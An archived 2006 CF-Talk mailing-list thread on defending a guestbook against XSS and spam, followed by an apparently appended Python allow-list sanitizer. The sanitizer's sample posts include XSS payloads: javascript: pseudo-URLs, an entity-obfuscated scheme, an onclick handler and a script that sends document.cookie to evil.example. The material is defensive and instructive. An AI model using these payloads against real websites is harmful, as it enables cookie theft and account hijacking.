Here is a good example of the kind of determination people trying to
prevent JS hacks (e.g. XSS) are facing:

http://namb.la/popular/tech.html

On 8/8/06, Mike Kear <[EMAIL PROTECTED]> wrote:
> I have a site where the guestbook is a constant problem for me.  I've
> tried persuading the radio station management that they really don't
> want a guestbook but they see it as an important way to interact with
> the listeners.
>
> We'll get a fan of a show saying how the host is wonderful - a dream -
> 'a real spunk' then a whole tribe of others saying how ugly and
> totally undesirable the host is.  Never any middle ground.
>
> So I have to keep it going.
>
> It's a constant source of problems, from people at other stations or
> fans of other stations trying to embarrass us by putting links to porn
> or telling out-and-out lies there. We get lots of spammers trying to
> use our guestbook form to send their emails or post links to their
> sites.
>
> Here are some of the things we do (and it's a changing feast - I'm
> always tinkering with the process page to tighten it up a little
> without inhibiting the real listeners posting, which is why we haven't
> gone to using Captcha yet).
>
> [A] no guestbook post goes straight to the site.  It goes to an editor first
> [B] any post containing the character < gets dumped. (early attempt to
> filter out HTML)
> [C] any post containing some reserved words gets dumped.
> [D] Just in case [B] didn't catch it, all posts are HTMLEditFormatted
> [E] All posts go through <cfqueryparam> on their way into the database
> [F] Any posts not coming from the right page (i.e. having
> cgi.http_referer with the correct value) get dumped.
> [G] The IP address of every post is stored, and posts coming from some
> IPs and some domains are dumped.
>
> The poster doesn't always get notified that the post has been dumped -
> I don't want to give too many clues to the abusers about what checks
> are being made. There aren't any foolproof safeguards, but we keep on
> working on it while trying to resist any measure that will make it
> more difficult for legitimate listeners to post.
>
> It keeps managing that site interesting though!
>
>
> Cheers
> Mike Kear
> Windsor, NSW, Australia
> Adobe Certified Advanced ColdFusion Developer
> AFP Webworks
> http://afpwebworks.com
> ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
>
> On 8/8/06, Dave Watts <[EMAIL PROTECTED]> wrote:
> > > Do you have any scripts that you can share?
> >
> > Well, no, unfortunately.
> >
> > The reason for this is that there are various approaches that you can take
> > to solve this problem, and these approaches are very dependent on what
> > you're trying to accomplish - it's not a matter of just having a script that
> > you can plug in. One solution, as Michael Dawson mentioned, is to use
> > HTMLEditFormat to remove all HTML from input. This is pretty simple, and
> > prevents many XSS attacks (though not necessarily all). But what if you want
> > to allow people to input HTML in the first place? This is somewhat common in
> > CMS environments, for example. This is why "languages" like BBML exist - to
> > allow limited HTML authoring without allowing the author to submit HTML to
> > the server. Even then, you have to watch out for things like JavaScript
> > pseudo-URLs, which bypass any tag-based approach to removing XSS exploits.
> >
> > In addition, you may choose to differentiate between "safe" and "unsafe"
> > strings, an approach recommended by Joel Spolsky in passing here:
> >
> > http://www.joelonsoftware.com/articles/Wrong.html
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> >
>
> 
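The two points the thread makes, that a tag-based filter does not stop javascript: pseudo-URLs and that "safe" and "unsafe" strings should be kept apart, as an added example in Python rather than ColdFusion. This is not code from the thread or from any of its posters: the parser is Python's standard html.parser, and the allow-lists, the function names (safe_url, sanitize, strip_all_html, render_entry) and the sample guestbook posts are constructed for the illustration.

```python
"""Allow-list HTML sanitizer with a distinct type for sanitized output.

Added example, not code from the CF-Talk thread or any of its posters.
Allow-lists, function names and sample posts are constructed for this
illustration; the parser is the stdlib html.parser.
"""
import html
import re
from html.parser import HTMLParser
from typing import NewType, Optional
from urllib.parse import urlsplit

# "Safe" vs "unsafe" string: only sanitize()/strip_all_html() produce SafeHtml,
# and only SafeHtml may be passed to the template (checked by mypy/pyright).
SafeHtml = NewType("SafeHtml", str)

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style=, no on*= handlers anywhere
URL_ATTRS = {"href"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
_CONTROLS = re.compile(r"[\x00-\x20]")   # chars browsers ignore inside a scheme


def safe_url(value: str) -> Optional[str]:
    """Return the URL if its scheme is on the allow-list, else None.

    A tag allow-list still lets <a href="javascript:..."> through, so URL
    attributes are normalised the way a browser will before the scheme is
    compared: entities decoded (jav&#x09;ascript:), then tabs, newlines and
    NULs removed (jav\tascript:). Scheme-less/relative URLs are rejected too.
    """
    decoded = _CONTROLS.sub("", html.unescape(value))
    scheme = urlsplit(decoded).scheme.lower()
    return decoded if scheme in ALLOWED_SCHEMES else None


class _Sanitizer(HTMLParser):
    """Rebuilds the markup from scratch, keeping only allow-listed pieces."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                           # tag dropped, its text content kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                     # drops onclick=, style=, etc.
            if name in URL_ATTRS:
                value = safe_url(value or "")
                if value is None:
                    continue                 # link kept as a dead <a>, URL gone
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text, including the body of a dropped <script>, is re-escaped so it
        # can never be parsed as markup again.
        self.out.append(html.escape(data, quote=False))


def sanitize(untrusted: str) -> SafeHtml:
    """Limited HTML authoring: allow-listed tags, attributes and URL schemes."""
    parser = _Sanitizer()
    parser.feed(untrusted)
    parser.close()
    return SafeHtml("".join(parser.out))


def strip_all_html(untrusted: str) -> SafeHtml:
    """The HTMLEditFormat-style option: no markup at all, everything escaped."""
    return SafeHtml(html.escape(untrusted, quote=True))


def render_entry(markup: SafeHtml) -> str:
    """Template code only accepts SafeHtml; passing a raw str is a type error."""
    return f"<li>{markup}</li>"


# Constructed guestbook posts: one legitimate, four hostile.
SAMPLE_POSTS = [
    "The host is <b>wonderful</b> &amp; a dream!",
    '<a href="javascript:alert(document.cookie)">click me</a>',
    '<a href="jav&#x09;ascript:alert(1)">obfuscated</a>',
    '<a href="http://example.com/" onclick="steal()">ok link</a>',
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
]

if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print(render_entry(sanitize(post)))
```

The NewType gives the "safe"/"unsafe" split Dave Watts refers to: at run time SafeHtml is just a str, but a type checker refuses a raw request parameter where render_entry expects SafeHtml, so the only way to get untrusted text onto the page is through one of the two sanitizers. When the guestbook does not need any markup, strip_all_html (the HTMLEditFormat approach) is the simpler and safer of the two; the allow-list sanitizer is the version to reach for when limited formatting or links must be allowed, and its safe_url step is what closes the pseudo-URL hole a tag filter leaves open.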

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:249120